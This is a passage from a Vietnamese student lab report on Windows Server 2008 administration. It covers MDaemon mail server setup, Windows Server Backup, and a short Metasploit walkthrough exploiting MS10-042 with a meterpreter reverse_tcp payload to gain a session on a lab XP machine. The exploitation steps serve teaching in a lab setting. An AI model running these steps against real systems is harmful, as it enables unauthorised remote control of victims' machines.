Xuất hiện hộp thoại,vào Accounts chọn Accounts settings


Bỏ click chuột vào phần Require strong passwords


Tiếp vào Account chọn New Account,điền tên và pass địa chỉ mail tk1->ok

Ta làm tương tự cho tk2,

Sau đó,về lại máy Xp để thực hiện việc gởi và nhận mail


Tiếp tục mặc định chọn Next


Trước khi gởi mail ta sẽ phải nhập name Display

Sau đó điền địa chỉ Email


Gõ địa chỉ IP của Mail sever

Nhập Pass


Chọn Create Mail để sọa thư gởi

Ta sẽ nhận được mail bên máy Xp2,với nội dung là xin chao bạnTiếp tục tương tự ta sẽ thực hiện gởi mail từ máy Xp2 sang Xp1 với nội dung thư “da nhan duoc”


Tiếp tục kiểm tra thư bên máy Xp1

Như vậy đã hoàn thành quá trình gởi và nhận mail trên 2 máy Xp1 và XP2


4.10 Khai thác mã lỗi MS10_042Đăng nhập bằng lệnh msfconsole

Khai thác mã lỗi MS10_042 bằng lệnh search ms10_042


Sử dụng lệnh use copy mã lỗi

Tiếp theo ta sẽ gõ lệnh show options để coi các thuộc tính thông tin của mã lỗi


Gõ Set srvhost -> Địa chỉ máy xp 192.168.232.129

Tiếp theo gõ set payload windowns/meterpreter/reverse_tcp


Set lhost -> Địa chỉ IP máy back track:192.168.232.129

Gõ lệnh exploit,để xuất hiện mã lỗi,sau đó coppy mã lỗi qua máy XP để khai thác mã lỗi


Chúng ta sẽ cho nạn nhân truy cập vào mã lỗi vừa tạo

Chúng ta sẽ thấy địa chỉ máy XP đang truy cập là 192.168.232.128


Gõ tiếp dòng lệnh Sessions,chúng ta sẽ thấy có một máy đang bị tấn công là máy XP có địa chỉ 192.168.232.128 thông qua bọt 1067

Tiếp tục dòng lệnh Sessions –i 1


Gõ getuid để coi tên máy nạn nhân

Như vậy việc khai thác mã lỗi đã thành công


4.11 Mail Server trên VPSMô hình:

Mục tiêu:- Cài đặt dịch vụ Mail Server (sử dụng phần mềm Mdeamon_Mail)

trên máy chủ ảo (VPS)- Thực hiện kiểm tra gửi mail tới các tài khoản Gmail, Yahoo

mail… và ngược lạiLưu ý: Nếu thực hiện bài trên môi trường máy ảo VM-Ware

- Các card mạng để ở chế độ Host – Only- Nên tắt tường lửa trên Server và PC

Thực hiện:- Bước 1: Cài đặt phần mềm Mdeamon_Mail- Bước 2: Cấu hình Mdeamon_Mail- Bước 3: Tạo tài khoản trên Mdeamon_Mail

Bước 1: Cài đặt phần mềm Mdeamon_MailĐăng nhập máy chủ ảo VPS bằng công cụ Remote Desktop.Dowload bộ cài đặt Mdeamon và chạy file Setup.exe


Trước tiên, bạn tải phiên bản MDaemon Mail Server mới nhất và bắt

đầu quá trình cài đặt.Bấm "Next" để tiếp tục.

Đánh dấu vào ô "I have read and I agree with all the terms of this license agreement"


Chọn đường dẫn lưu trữ của chương trình, mặc định sẽ là ổ C hệ thống (ổ đĩa có cài hệ điều hành Microsoft Windows).

Lựa chọn phiên bản cài đặt, nếu bạn có key đăng ký thì nhập vào ô phía dưới. Ở ví dụ sử dụng là phiên bản free hoặc miễn phí 30 ngày của phiên bản Pro.



Điền các thông tin phù hợp với vị trí, ở đây là VietNam

Sau khi hoàn tất các bước trên, chọn "Next" để bắt đầu cài đặt.


Chờ đợi cho quá trình cài đặt hoàn tất.

Điền tên Domain chính xác ví dụ: phamthidiemkieu.vn


Điền địa chỉ DNS chính (Primary) và dự phòng (Backup)


Giữ nguyên lựa chọn "Setup MDaemon as a system service"

Bấm "Finish" để kết thúc quá trình cài đặt và cấu hình ban đầu, bắt đầu sử dụng


Giao diện sau khi cài đặt thành công.


Tạo 1 tài khoảng mới vào Account New Account…

Nhập thông tin vào Email address và Email Password. Click OK để tạo tài khoảng Email.


Qua Win XP1 tạo Client 1……Ta vào Outlook Express.


Cấu hình Out Look mail để quán lý mail cho tài khoảng

[email protected]. Nhập tên hiện thị vào Display name và click Next>

Nhập địa chỉ Email và Click Next>

mailto:[email protected]


Nhập địa chỉ IP vào 2 ô Incoming và Outgoing và click Next.

Nhập tên tài khoảng và mật khẩu. Click Next


Click Finish để hoàn tất cấu hình quản lý mail cho tài khoảng test.


Qua Win XP 2 tạo Client 2.

Nhập địa chỉ E-mail


Trong cửa sổ Internet Connection Wizard điền thông tinTrong cửa sổ Internet Connection Wizard điền thông tin


Nhập Mail và Pass để đăng nhậpQua máy Xp1 đê gởi Mail cho Xp2

Qua Xp2 kiểm tra Mail,ta thấy nội dung mail như đã gởi


Tiếp tục việc gởi Mail ngược lại từ Xp2 cho Xp1

Kiểm tra Mail bên máy Xp1


Tiếp tục trên máy Xp1 gởi mail đến địa chỉ mail thật

4.12 WINDOWS SERVER BACKUPI. Mục đíchWindows server backup là một tính năng mới trên hệ điều hành

Windows Server 2008 cung cấp chức năng lưu trữ (Backup), phục hồi dữ liệu (restore) và phục hồi hệ thống (Operating System Windows Recovery). Sẽ giúp cho người quản trị phục hồi nhanh chóng nếu hệ thống bị sự cố.

II. Các nội dung chính- Cài đặt Windows Server Backup.- Backup Server.- Restore File và Folder.


III. Các bước thực hiện1. Cài đặt Windows Server BackupMở Administrator Tools Server Manager, click chuột phải

Feature Add Feature.Cửa sổ Select Feature, bung Windows Server Backup Feature

chọn Windows Server Backup Next.


Cửa sổ Comfirm Installation Selections, chọn Install. Sau khi cài đặt hoàn tất. Thì đóng cửa sổ lại.

2. Backup Full Server


Mở Administrative Tools Windows Server Backup, vào Action chọn Backup Once… Cửa sổ Backup options, kiểm tra chọn

Different options, chọn Next.Cửa sổ Select backup configuration, chọn Full Server, chọn Next.Cửa sổ Select backup destination, trong ô Backup destination chọn ổ

cứng để lưu trữ file backup Next.


Trong hộp thoại Windows Server Backup Yes cửa sổ specify advance option, chọn VSS copy backup Next Backup.

Quá trình Backup đang diễn ra.


Cửa sổ Backup progress, kiểm tra backup thành công Close.

Mở Windows Explore, vào ổ cứng lưu file backup kiểm tra các folder WindowsImageBackup ( folder lưu trữ các file backup).

3. Restore File và FolderMở Windows Explore, vào ổ C xóa một vài thư mục ( giả sử server

bị mất dữ liệu).Mở Windows Server Backup trong Administrative Tools, vào

Action Recover… cửa sổ Getting started, chọn This Server Next.


Cửa sổ Select backup date, chọn đúng ngày lưu trữ file backup Next cửa sổ Select item to recover, bung ổ đĩa chứa folder cần Restore Next cửa sổ Specify recovery options, giữ cấu hình mặc định Next cửa sổ Confirmation, chọn Recover cửa sổ Recovery progress, kiểm tra folder restore thành công Close.

Mở Windows Explorer, vào kiểm tra Restore được foder.Vậy là đã hoàn thành Windows Server Backup trên Windows Server

2008.


Kết LuậnNhững vấn đề đạt được:

Cài đặt và cấu máy chủ Windows Server 2008 Cài đặt máy chủ quản trị miền Domain Controller Cấu hình máy chủ DHCP và DNS Cài đặt và cấu hình Mail Server trên Local và trên VPS Cài đặt và cấu hình Web Server trên Local Cài đặt và triển khai VPN Client to Site trên Local Sử dụng công cụ quản trị Server Manager trên Windows Server

2008 Tài khoản người dùng, tài khoản máy tính, nhóm và đơn vị tổ

chức Quản trị môi trường làm việc người dùng, máy tính sử dụng

chính sách nhóm Quản lý và cấp phép quyền truy cập tài nguyên Backup dữ liệu trên Windows Server 2008 Khai thác mã lỗi của System Hacking

Hướng phát triển của đề tài: Nghiên cứu và triển khai mô hình VPN Site to Site trên Local Mở rộng và đưa ra kế hoạch bảo mật mạng và máy chủ Đảm bảo tính khả dụng và khai phục hệ thống sau thảm họa Cài đặt và cấu hình VPN Site to Site trên VPS Cài đặt và cấu hình Web Server trên VPS


Phụ lụcTài liệu tham khảo:

Tài liệu MCSA quản trị mạng trên Windows Server 2008 (Trung tâm Athena)

Một số Website: http://www.athena.com.vn/ http://www.nhatnghe.com/ http://www.google.com/ http://www.youtube.com/

Và một số tài liệu khác trên internetLink báo cáo:Slide Báo Cáo Cuối Kỳhttp://www.slideshare.net/LyND1473/bo-co-cui-k-34350320/Windows Server Backuphttps://www.youtube.com/watch?v=lz1xpoLRqsY/DHCP https://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be/DNS localhttps://www.youtube.com/watch?v=yN5a8L-zhXM&feature=youtu.be/Local Policyhttps://www.youtube.com/watch?v=1007li4xG9k&feature=youtu.be/Local Security Policyhttps://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be/Local User & Group

https://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be/

https://www.youtube.com/watch?v=LjuHSWdMA7Y&feature=youtu.be/

https://www.youtube.com/watch?v=1007li4xG9k&feature=youtu.be/

https://www.youtube.com/watch?v=yN5a8L-zhXM&feature=youtu.be/

https://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be/

https://www.youtube.com/watch?v=AnmZGJR88TM&feature=youtu.be/

https://www.youtube.com/watch?v=lz1xpoLRqsY/

http://www.slideshare.net/LyND1473/bo-co-cui-k-34350320/

http://www.youtube.com/

http://www.google.com/

http://www.nhatnghe.com/

http://www.athena.com.vn/

Education

Báo Cáo Cuối Khóa